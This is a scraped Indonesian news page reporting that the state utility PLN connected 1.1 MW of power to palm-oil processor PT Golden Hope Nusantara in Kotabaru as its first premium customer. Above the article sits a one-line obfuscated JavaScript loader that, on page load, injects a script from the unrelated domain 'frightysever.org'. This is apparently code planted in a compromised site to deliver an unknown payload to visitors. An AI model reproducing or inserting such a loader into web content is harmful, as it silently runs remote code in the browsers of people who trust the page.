(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

PT Golden Hope Nusantara Jadi Pelanggan Premium PLN Pertama di Kotabaru


KOTABARU, PT PLN Wilayah Kalselteng menyambung listrik bagi PT Golden Hope Nusantara (GHN) dengan total daya 1,1 Mega Watt (MW) yang menjadi pelanggan premium pertama di Kotabaru. Penyambungan listrik tersebut diwujudkan dengan melakukan pengaktifan jaringan pada kubikel, Senin (26/2) di Kotabaru.

PT GHN merupakan anak perusahaan Simedarby Plantation dengan kantor pusat berada di Kuala Lumpur, Malaysia. Perusahaan dibawah pimpinan Mohd. Hamdi Abd. Karim tersebut merupakan industri yang bergerak di bidang pengolahan Crude Palm Oil (CPO).

Beroperasi sejak tahun 2013, sebelumnya PT GHN menggunakan genset dengan daya 1 x 4 MW untuk operasional perusahaan. Dengan bergabung menjadi pelanggan premium PLN.

Head of Departement Production and Process  PT Golden Hope Nusantara Fauzil Wahid menyampaikan bahwa adanya suplai listrik dari PLN membantu meringankan cost operational perusahannya.

Fauzi mengatakan, dengan menjadi pelanggan premium, perusahaannya dapat mengurangi beban kerja, sebelumnya beroperasi menggunakan genset sehingga dapat meningkatkan produksi.

“Kami mengucapkan banyak terimakasih kepada PLN Area Kotabaru karena telah bersedia menyuplai listrik sebesar 1,1 MW bagi perusahaan kami. Ini merupakan suatu sejarah bagi PT Golden Hope Nusantara. Dengan menggunakan listrik PLN, kami lebih bisa meningkatkan produksi”, ucap Fauzi.

Senada dengan Fauzi, Manajer PLN Kotabaru Faisal Muslim, berharap penyambungan daya listrik sebesar 1,1 MW ini merupakan tahap awal dari kerjasama antara PLN dengan PT GHN.

Faisal menyampaikan, PLN akan berusaha melakukan percepatan realisasi pembangunan Gardu Induk (GI) Kotabaru sehingga ke depannya PLN dapat memenuhi kebutuhan daya di PT GHN sebesar 4 MW.

Dia mengatakan,sebagai pelanggan premium, PT GHN berkesempatan untuk mendapat layanan prioritas dari PLN. Kebutuhan pelanggan akan lebih mudah dilayani dengan adanya account executive dari PLN yang langsung berada di bawah Manajer Area beserta Asisten Manajernya.

“Dengan menjadi pelanggan premium kami memastikan keandalan jaringan yang menyuplai ke pelanggan diprioritaskan sehingga mencegah terjadinya padam. Apabila terjadi padam akibat gangguan jaringan, PT GHN sebagai pelanggan premium akan diprioritaskan terlebih dahulu. Untuk tarifnya sendiri memang berbeda dengan tarif pelanggan biasa. Tapi kami pastikan bahwa semua itu sepadan dengan dengan jaminan keandalan listrik yang diberikan PLN,” kata Faisal.

Faisal juga menyampaikan bahwa pada dasarnya PLN sangat mendukung pertumbuhan ekonomi di Indonesia. Tidak hanya di kota besar, PLN siap memberikan suplai listrik dan layanan terbaik bagi industri, khususnya di Kalimantan Selatan.

 “Layanan premium bagi pelanggan industri merupakan bentuk dukungan PLN dalam pertumbuhan ekonomi daerah. Kepercayaan pelanggan untuk menggunakan layanan premium PLN tidak akan kami sia-siakan. Semoga ke depannya, lebih banyak lagi pelanggan PLN yang beralih menjadi pelanggan premium,” pungkas Faisal. (abdullah/hms)

Reporter: Abdullah/hms
Editor: Chell

Desy Arfianty

Recent Posts

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

46 menit ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

2 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

3 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

3 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

4 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

5 jam ago

This website uses cookies.